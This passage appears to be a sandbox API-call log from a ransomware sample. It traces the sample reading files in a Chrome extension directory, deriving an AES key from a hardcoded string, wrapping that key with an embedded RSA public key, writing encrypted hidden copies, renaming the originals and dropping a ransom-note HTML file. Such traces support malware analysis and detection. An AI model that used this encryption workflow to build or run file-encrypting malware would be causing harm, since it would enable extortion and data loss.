lpBuffer=0x2e71f20*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.766] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.768] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.768] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.771] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.771] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.771] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.771] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x245, lpOverlapped=0x0) returned 1 [0261.771] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x245, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x250) returned 1 [0261.771] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x250, lpOverlapped=0x0) returned 1 [0261.771] CloseHandle (hObject=0x5d60) returned 1 [0261.771] CloseHandle (hObject=0x5d64) returned 1 [0261.771] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), bFailIfExists=0) returned 1 [0261.774] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js", dwFileAttributes=0x0) returned 1 [0261.775] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg")) returned 1 [0261.776] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.fuck")) returned 1 [0261.777] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.777] CryptDestroyKey (hKey=0x2e7dc00) returned 1 [0261.777] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.777] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0261.777] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0261.777] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\readme_back_files.htm")) returned 0xffffffff [0261.777] AreFileApisANSI () returned 1 [0261.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 170 [0261.778] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.781] GetFileType (hFile=0x5d50) returned 0x1 [0261.781] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0261.782] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.782] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.782] GetLastError () returned 0x0 [0261.782] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js")) returned 0x20 [0261.783] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js", dwFileAttributes=0x80) returned 1 [0261.783] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.784] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.785] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.gsg", dwFileAttributes=0x2) returned 1 [0261.785] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.788] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.788] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.788] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.788] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc40) returned 1 [0261.788] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.788] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.788] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72030) returned 1 [0261.789] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72030, dwCertEncodingType=0x1, pInfo=0x2eac170*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac1a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac1a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7dc00) returned 1 [0261.789] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.789] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e720b8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e720b8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.789] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e720b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e720b8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.790] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.803] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.803] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.805] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.806] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.806] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.806] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.806] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.807] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.807] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.807] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.807] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.807] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.808] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.808] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.808] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.808] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.809] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.809] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.809] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.809] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.809] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.809] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.810] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.810] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.810] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.810] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.810] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.811] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.811] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 